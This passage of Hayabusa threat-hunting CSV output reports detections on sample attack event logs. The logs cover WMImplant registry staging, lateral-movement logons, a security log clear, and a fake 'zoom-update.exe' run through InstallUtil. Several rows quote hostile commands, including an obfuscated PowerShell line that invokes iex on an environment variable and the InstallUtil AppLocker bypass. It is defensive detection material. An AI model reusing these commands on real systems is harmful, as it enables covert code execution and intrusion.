19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered 
Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: 
87,105,110,100,111,119,115,32,73,80,32,67,111,110,102,105,103,117,114,97,116,105,111,110,13,10,13,10,32,32,32,72,111,115,116,32,78,97,109,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,102,115,48,51,118,117,108,110,13,10,32,32,32,80,114,105,109,97,114,121,32,68,110,115,32,83,117,102,102,105,120,32,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,32,32,32,78,111,100,101,32,84,121,112,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,72,121,98,114,105,100,13,10,32,32,32,73,80,32,82,111,117,116,105,110,103,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,87,73,78,83,32,80,114,111,120,121,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,68,78,83,32,83,117,102,102,105,120,32,83,101,97,114,99,104,32,76,105,115,116,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,13,10,69,116,104,101,114,110,101,116,32,97,100,97,112,116,101,114,32,69,116,104,101,114,110,101,116,48,58,13,10,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,73,110,116,101,108,40,82,41,32,56,50,53,55,52,76,32,71,105,103,97,98,105,116,32,78,101,116,119,111,114,107,32,67,111,110,110,101,99,116,105,111,110,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32
,46,32,46,32,46,32,58,32,89,101,115,13,10,32,32,32,76,105,110,107,45,108,111,99,97,108,32,73,80,118,54,32,65,100,100,114,101,115,115,32,46,32,46,32,46,32,46,32,46,32,58,32,102,101,56,48,58,58,99,48,98,100,58,54,57,54,99,58,51,57,54,48,58,97,49,98,49,37,49,50,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,73,80,118,52,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,51,56,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,83,117,98,110,101,116,32,77,97,115,107,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,50,53,53,46,50,53,53,46,50,53,53,46,48,13,10,32,32,32,68,101,102,97,117,108,116,32,71,97,116,101,119,97,121,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,13,10,32,32,32,68,72,67,80,118,54,32,73,65,73,68,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,51,48,50,48,49,48,52,53,52,13,10,32,32,32,68,72,67,80,118,54,32,67,108,105,101,110,116,32,68,85,73,68,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,49,45,48,48,45,48,49,45,50,54,45,52,54,45,50,56,45,65,68,45,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,78,83,32,83,101,114,118,101,114,115,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,48,13,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,49,48,46,50,51,46,52,50,46,49,49,13,10,32,32,32,78,101,116,66,73,79,83,32,111,118,101,114,32,84,99,112,105,112,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,69,110,97,98,108,101,100,13,10,13,10,84,117,110,110,101,108,32,97,100,97,112,116,101,114,32,105,115,97,116,97,112,46,123,68,54,56,57,48,67,54,52,45,54,67,56,55,45,52,48,54,65,45,65,69,66,56,45,69,51,51,70,53,52,69,53,66,67,56,50,125,58,13,10,13,10,32,32,32,77,101,100,105,97,32,83,116,97,116,101,32,46,32,46
,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,101,100,105,97,32,100,105,115,99,111,110,110,101,99,116,101,100,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,105,99,114,111,115,111,102,116,32,73,83,65,84,65,80,32,65,100,97,112,116,101,114,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,69,48,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115 | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon 
Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: 
A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-13 23:08:45.929 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process: | Target Server: cifs/fs03vuln.offsec.lan,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx +2021-11-13 23:30:53.638 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fc2 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" +2021-11-18 16:40:29.566 
+09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:29.774 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 
510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:29.809 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:30.866 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:35.935 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:46.157 
+09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:40:46.404 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:42:34.415 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:34.416 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:43:04.979 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:43:22.487 